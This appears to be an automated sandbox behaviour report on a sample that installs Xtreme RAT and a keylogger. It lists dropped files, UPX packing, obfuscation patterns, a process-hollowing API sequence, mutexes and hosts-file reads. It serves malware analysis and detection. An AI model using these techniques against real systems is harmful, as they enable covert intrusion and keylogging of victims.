Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
Drops PE filesShow sources
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exeJump to dropped file
Source: C:\Users\user\Desktop\sxz.exeFile created: C:\Users\user~1\AppData\Local\Temp\server.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dllJump to dropped file
Source: C:\Windows\InstallDir\Server.exeFile created: C:\Users\user~1\AppData\Local\Temp\358saxio.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_es2.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Skype.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcr100.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Windows\InstallDir\Server.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcr100.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dllJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Windows\InstallDir\Server.exeJump to dropped file
Creates license or readme fileShow sources
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C83D8C LoadLibraryA,GetProcAddress,FreeLibrary,3_2_00C83D8C
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C82D48 push 00C82D74h; ret 3_2_00C82D6C
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C82D46 push 00C82D74h; ret 3_2_00C82D6C
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C83420 push 00C8349Fh; ret 3_2_00C83497
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C879DC push 00C87A65h; ret 3_2_00C87A5D
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C82924 push 00C82950h; ret 3_2_00C82948
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C880DC push 00C88108h; ret 3_2_00C88100
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C82548 push 00C82580h; ret 3_2_00C82578
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C88898 push 00C888C4h; ret 3_2_00C888BC
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C83F94 push 00C83FC0h; ret 3_2_00C83FB8
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C8258C push 00C825B8h; ret 3_2_00C825B0
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C823A4 push 00C823DEh; ret 3_2_00C823D6
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C879DA push 00C87A65h; ret 3_2_00C87A5D
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C848DC push 00C84908h; ret 3_2_00C84900
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C87DD0 push 00C87E13h; ret 3_2_00C87E0B
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C84578 push 00C845DCh; ret 3_2_00C845D4
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C82AD8 push 00C82B04h; ret 3_2_00C82AFC
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C8295C push 00C82988h; ret 3_2_00C82980
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C879A0 push 00C879D8h; ret 3_2_00C879D0
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C8503C push 00C85068h; ret 3_2_00C85060
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C84034 push 00C84060h; ret 3_2_00C84058
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C89AA8 push 00C89AECh; ret 3_2_00C89AE4
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C83C88 push 00C83CC0h; ret 3_2_00C83CB8
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C82D48 push 00C82D74h; ret 3_1_00C82D6C
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C82D46 push 00C82D74h; ret 3_1_00C82D6C
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C83420 push 00C8349Fh; ret 3_1_00C83497
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C879DC push 00C87A65h; ret 3_1_00C87A5D
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C82924 push 00C82950h; ret 3_1_00C82948
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C880DC push 00C88108h; ret 3_1_00C88100
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C82548 push 00C82580h; ret 3_1_00C82578
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C88898 push 00C888C4h; ret 3_1_00C888BC
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C83F94 push 00C83FC0h; ret 3_1_00C83FB8
Sample is packed with UPXShow sources
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C835B0 FindFirstFileW,CloseHandle,3_2_00C835B0
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C835B0 FindFirstFileW,CloseHandle,3_1_00C835B0
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C835B0 FindFirstFileW,CloseHandle,5_2_00C835B0
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C835B0 FindFirstFileW,CloseHandle,6_2_00C835B0
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_00405FAC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00405FAC
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C835B0 FindFirstFileW,CloseHandle,15_2_00C835B0
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C835B0 FindFirstFileW,CloseHandle,15_1_00C835B0

System Summary:

barindex
Installs Xtreme RATShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeWindow created: XtremeKeyloggerJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeWindow created: XtremeKeylogger
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,3_2_00C84600
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,3_1_00C84600
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,5_2_00C84600
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,6_2_00C84600
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,15_2_00C84600
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,15_1_00C84600
Creates files inside the system directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Windows\InstallDir\Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\InstallDir\Server.exeMutant created: \Sessions\1\BaseNamedObjects\XTREMEUPDATE
Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\DSma9HnKaPERSIST
Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\DSma9HnKaEXIT
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeMutant created: \Sessions\1\BaseNamedObjects\C7379241760F18F4D05EC3BE
Source: C:\Windows\InstallDir\Server.exeMutant created: \Sessions\1\BaseNamedObjects\DSma9HnKa
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C8939E3_2_00C8939E
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C88EF83_2_00C88EF8
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C8941B3_2_00C8941B
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C8939E3_1_00C8939E
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C88EF83_1_00C88EF8
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C8941B3_1_00C8941B
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C88ECC5_2_00C88ECC
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C8939E5_2_00C8939E
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C8941B5_2_00C8941B
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C88EC45_2_00C88EC4
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C8939E6_2_00C8939E
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C8941B6_2_00C8941B
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C88ECC6_2_00C88ECC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C88EC46_2_00C88EC4
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0048582812_2_00485828
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_00482ECC12_2_00482ECC
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_00455A3012_2_00455A30
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0046816C12_2_0046816C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_00478D9812_2_00478D98
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0046DDC812_2_0046DDC8
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0047A38012_2_0047A380
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0043957C12_2_0043957C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0040218012_2_00402180
Source: C:\Windows\explorer.exeCode function: 14_1_01B8939E14_1_01B8939E
Source: C:\Windows\explorer.exeCode function: 14_1_01B8941B14_1_01B8941B
Source: C:\Windows\explorer.exeCode function: 14_1_01B88EF814_1_01B88EF8
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C8939E15_2_00C8939E
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C8941B15_2_00C8941B
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C88ECC15_2_00C88ECC
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C88EC415_2_00C88EC4
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C8939E15_1_00C8939E
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C8941B15_1_00C8941B
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C88ECC15_1_00C88ECC
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C88EC415_1_00C88EC4
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: String function: 00404D88 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: String function: 00406E2C appears 63 times
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: String function: 00C854EC appears 178 times
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: String function: 00C82F90 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: String function: 00C81F1C appears 180 times
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: String function: 00C82744 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: String function: 00C81BB4 appears 354 times
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: String function: 00C833A8 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: String function: 00C888D0 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: String function: 00C826F4 appears 40 times
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: String function: 00C854EC appears 89 times
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: String function: 00C81F1C appears 90 times
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: String function: 00C81BB4 appears 177 times
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: String function: 00C833A8 appears 47 times
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: String function: 00C888D0 appears 41 times
Source: C:\Windows\InstallDir\Server.exeCode function: String function: 00C854EC appears 178 times
Source: C:\Windows\InstallDir\Server.exeCode function: String function: 00C82F90 appears 52 times
Source: C:\Windows\InstallDir\Server.exeCode function: String function: 00C81F1C appears 180 times
Source: C:\Windows\InstallDir\Server.exeCode function: String function: 00C82744 appears 42 times
Source: C:\Windows\InstallDir\Server.exeCode function: String function: 00C81BB4 appears 354 times
Source: C:\Windows\InstallDir\Server.exeCode function: String function: 00C833A8 appears 70 times
Source: C:\Windows\InstallDir\Server.exeCode function: String function: 00C888D0 appears 82 times
Source: C:\Windows\InstallDir\Server.exeCode function: String function: 00C826F4 appears 40 times
Source: C:\Windows\explorer.exeCode function: String function: 01B81BB4 appears 87 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00C854EC appears 89 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00C81F1C appears 90 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00C81BB4 appears 177 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00C833A8 appears 46 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00C888D0 appears 41 times
PE file contains executable resources (Code or Archives)Show sources
Source: 358saxio.exe.3.drStatic PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
Source: Skype.exe.12.drStatic PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
Source: 358saxio.exe.27.drStatic PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
Source: Skype.exe.35.drStatic PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
PE file contains strange resourcesShow sources
Source: sxz.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Skype.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 358saxio.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Skype.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 358saxio.exe.27.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Skype.exe.35.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile read: C:\Windows\System32\drivers\etc\hosts
